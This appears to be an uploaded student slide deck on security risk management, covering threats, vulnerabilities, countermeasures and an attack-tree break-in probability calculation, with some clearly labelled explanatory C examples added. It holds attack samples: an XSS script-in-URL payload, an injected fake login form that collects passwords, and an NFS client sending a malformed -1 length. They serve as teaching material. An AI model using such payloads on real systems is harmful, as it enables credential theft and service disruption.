Risk Management
Company name
Prepared by Mahmoud Elmadhoun
Supervised by Ms. Eman Elagrami


Upload: ferdinand-norman

Post on 27-Dec-2015


Agenda
• The definition of Risk, and the sections
• Countermeasures in the event of Risk
• How to manage the Risk and probability


The definition of Risk and the sections
• Risk is the probability that a threat exists and can therefore be exploited; if that threat is used, it may be called the Vulnerability.
• From this definition, the main sections of Risk can be separated:
Threat: the process of trying to access the organization's confidential information
Vulnerabilities: the weaknesses in the organization through which the attacker can get in


Vulnerabilities
• Vulnerabilities are of two types:
Technical Vulnerability: where protection is weak and the attacker uses this vulnerability, the attack is known as a technical attack
Administrative Vulnerability: the attack is the so-called non-technical attack, or social engineering attack


Vulnerabilities
• They can also be divided into two in terms of ease and difficulty:
High-level Vulnerability: easy to use, for example by writing software code to exploit that gap
Low-level Vulnerability: difficult to use, and requires a lot of financial resources or a long time from the attacker


Example
• Vulnerability of XSS (Cross Site Scripting)
• (HTML, JavaScript, VBScript, ActiveX, Flash)
• Amend the URL address for a given site
• <Script language="Javascript">alert('Welcome')</script>
• http://www.example.com/search?keyword=<Script language="Javascript">alert('Welcome')</script>


• <br><br>Please login with the form below before proceeding:<form action="destination.asp"><table><tr><td>Login:</td><td><input type=text length=20 name=login></td></tr><tr><td>Password:</td><td><input type=text length=20 name=password></td></tr></table><input type=submit value=LOGIN></form>


Vulnerabilities
unsigned linux-2.4, signed/unsigned

    static inline u32 *decode_fh(u32 *p, struct svc_fh *fhp)
    {
        unsigned int size;

        fh_init(fhp, NFS3_FHSIZE);
        size = ntohl(*p++);            /* length field taken from the request */
        if (size > NFS3_FHSIZE)        /* bound check before the copy */
            return NULL;
        memcpy(&fhp->fh_handle.fh_base, p, size);
        fhp->fh_handle.fh_size = size;
        return p + XDR_QUADLEN(size);
    }


Code

    #include <stdio.h>
    #include <rpcsvc/nfs_prot.h>
    #include <rpc/rpc.h>
    #include <rpc/xdr.h>
    #include <netinet/in.h>
    #include <sys/socket.h>
    #include <sys/types.h>

    #define NFSPROG 100003
    #define NFSVERS 3
    #define NFSPROC_GETATTR 1

    static struct diropargs heh;

    /* XDR encoder: ignores its argument and encodes the 32-bit value -1 */
    bool_t xdr_heh(XDR *xdrs, diropargs *heh)
    {
        int32_t werd = -1;
        return xdr_int32_t(xdrs, &werd);
    }

    int main(void)
    {
        CLIENT *client;
        struct timeval tv;

        client = clnt_create("marduk", NFSPROG, NFSVERS, "udp");
        if (client == NULL) {
            perror("clnt_create\n");
            return 1;   /* no client handle, nothing to call */
        }

        tv.tv_sec = 3;
        tv.tv_usec = 0;
        client->cl_auth = authunix_create_default();

        clnt_call(client, NFSPROC_GETATTR, (xdrproc_t) xdr_heh, (char *)&heh,
                  (xdrproc_t) xdr_void, NULL, tv);

        return 0;
    }
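The signed/unsigned point behind the decode_fh listing and the -1 length encoded by the client code, as an added example that is not from the original slides or from the Linux source. FH_MAX and all function names are assumptions made for the illustration; it compares the same bound check with a signed and an unsigned length and shows a copy that also checks the bytes actually received.

```c
#include <arpa/inet.h>   /* htonl, ntohl */
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#define FH_MAX 64        /* assumed stand-in for NFS3_FHSIZE */

/* Signed length: wire value 0xffffffff converts to -1 (two's complement),
 * and -1 > FH_MAX is false, so the bound check lets it through. */
static int accepts_signed(uint32_t wire)
{
    int size = (int)ntohl(wire);
    return !(size > FH_MAX);
}

/* Unsigned length, as declared in the decode_fh listing: the same wire
 * value stays 4294967295 and is rejected. */
static int accepts_unsigned(uint32_t wire)
{
    unsigned int size = ntohl(wire);
    return !(size > FH_MAX);
}

/* Hardened copy: unsigned length, bounded by the destination size and by
 * the bytes actually received. Returns bytes copied, or -1 on rejection. */
static long copy_handle(unsigned char *dst, const unsigned char *req, size_t len)
{
    uint32_t wire, size;
    if (len < sizeof wire) return -1;
    memcpy(&wire, req, sizeof wire);
    size = ntohl(wire);
    if (size > FH_MAX || size > len - sizeof wire) return -1;
    memcpy(dst, req + sizeof wire, size);
    return (long)size;
}

/* Constructed request: 4-byte length field followed by `payload` zero bytes. */
static long demo_copy(uint32_t claimed, size_t payload)
{
    unsigned char req[4 + FH_MAX] = {0}, dst[FH_MAX];
    uint32_t wire = htonl(claimed);
    memcpy(req, &wire, sizeof wire);
    return copy_handle(dst, req, sizeof wire + payload);
}

int main(void)
{
    printf("0xffffffff accepted: signed=%d unsigned=%d\n",
           accepts_signed(htonl(0xffffffffu)), accepts_unsigned(htonl(0xffffffffu)));
    printf("copy: valid=%ld oversized=%ld truncated=%ld\n",
           demo_copy(8, 8), demo_copy(0xffffffffu, 8), demo_copy(8, 4));
    return 0;
}
```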


Threat
• There are three essential components of a threat:
Target
Agent
Event


Target
• The target is the organization's information, and the attacker can work on each of the following:
Confidentiality: disclosing the confidential information to others
Integrity: the possibility of changing the organization's information
Availability: through denial of service (DoS)
Accountability: the attacker conceals the attack so as not to be held accountable for it


Agents
• An agent must have three features:
Access to the target: this may be direct access, i.e. an account with which to enter the system, or indirect access through an intermediary
Knowledge about the target
Motivation


Events
• Events take many forms. The most important are misuse of authorized access and unauthorized access to the information or the system, or the placing of malicious code (viruses or Trojans) in the systems.


Countermeasures in the event of Risk
• There is no doubt that information varies from facility to facility and from institution to institution. Appropriate action is taken according to the importance of the information: intervention before the danger occurs is called the Proactive Model, and intervention after the danger has occurred is called the Reactive Model.


Countermeasures in the event of Risk
• Some examples of countermeasures to a threat or attack:
Firewalls
Anti-virus software
Access Control
Two-factor authentication systems
Well-trained employees


How to manage the Risk and probability
• Steps involved in risk management:
Risk Analysis
Decision Management
Implementation


How to manage the Risk and probability
• In risk management, intervention is divided into two sections:
Reactive Model: a very well-known type, the so-called emotional intervention. For example, a security official in the company downloads an anti-virus program after the virus has spread and destroyed some devices. The cost can be calculated as follows:
Protection cost = total cost of the risk + the cost of countermeasures


How to manage the Risk and probability
Proactive Model: intervention prior to the Risk. This type is much better in terms of cost:
Protection cost = cost of the minimum risk + the cost of countermeasures


How to manage the Risk and probability
• Calculating the probability of a threat:
Begin at the top, so that it takes the form of a tree
Search for the paths leading to the occurrence of the threat or potential threat
Combine these paths using (OR, AND)
To calculate the probability, we start from the top down


How to manage the Risk and probability
• Example
When the attacker tries to break the root password:
Either the attacker tries to find the root password by guessing (Guessing the root password)
Or the attacker attacks the network as a whole, trying to find bugs in the network
At this point two conditions must hold for the bugs:
1- There are gaps that can be exploited (And, or); the second condition must be met together with it
2- The system has not been updated (no patching of this potential gap)


How to manage the Risk and probability
• P(guessing root password = A) = 5/1000 = 0.005
• P(exploiting active server = B) = 50/1000 = 0.05 (AND)
• P(system is not updated or not configured properly = C) = 0.1


How to manage the Risk and probability
• The assumption made is that guessing the password (A) is equal to exploiting the gap (B) when the system is not updated (C)
• P(attack service = BC) = P(B) * P(C) = 0.05 * 0.1 = 0.005 (AND)
• P(break-in) (total) = P(A) + P(BC) - P(A)P(BC) = 0.005 + 0.005 - 0.005 * 0.005 = 0.009975 (OR)
• Total probability of break-in: 0.009975
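The AND/OR calculation above, as an added example that is not part of the original slides. It generalizes the slide's two-branch formulas to any number of children under the assumption that the events are independent; the node layout, the function names and the 0.01 value used for a patched system are assumptions made for the illustration.

```c
#include <stddef.h>
#include <stdio.h>

enum kind { N_LEAF, N_AND, N_OR };

struct node {
    enum kind kind;
    double p;                     /* probability, used by leaves only */
    const struct node *child[4];  /* NULL-terminated list of children */
};

/* Assumes independent events. AND = product of the children;
 * OR = 1 - product of (1 - child), which for two children equals
 * P(X) + P(Y) - P(X)P(Y), the formula used on the slide. */
static double eval(const struct node *n)
{
    double acc = 1.0;
    if (n->kind == N_LEAF) return n->p;
    for (size_t i = 0; i < 4 && n->child[i] != NULL; i++) {
        double c = eval(n->child[i]);
        acc *= (n->kind == N_AND) ? c : 1.0 - c;
    }
    return (n->kind == N_AND) ? acc : 1.0 - acc;
}

/* The slide's tree: break-in = A OR (B AND C). */
static double break_in(double pa, double pb, double pc)
{
    const struct node a    = { N_LEAF, pa, { NULL } };
    const struct node b    = { N_LEAF, pb, { NULL } };
    const struct node c    = { N_LEAF, pc, { NULL } };
    const struct node bc   = { N_AND, 0.0, { &b, &c } };
    const struct node root = { N_OR, 0.0, { &a, &bc } };
    return eval(&root);
}

int main(void)
{
    /* Values from the slide: A = 0.005, B = 0.05, C = 0.1 */
    printf("slide values:      %.6f\n", break_in(0.005, 0.05, 0.1));
    /* Constructed what-if: patching lowers C to 0.01 */
    printf("with C = 0.01:     %.7f\n", break_in(0.005, 0.05, 0.01));
    return 0;
}
```

Lowering a leaf under the AND node shrinks only that branch, so the total stays bounded below by P(A).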


Reference
• http://www.c4arab.com/showlesson.php?lesid=1756
• http://www.c4arab.com/showlesson.php?lesid=175
• Cryptography and Network Security, 4th Edition, Prentice Hall, Nov. 2005
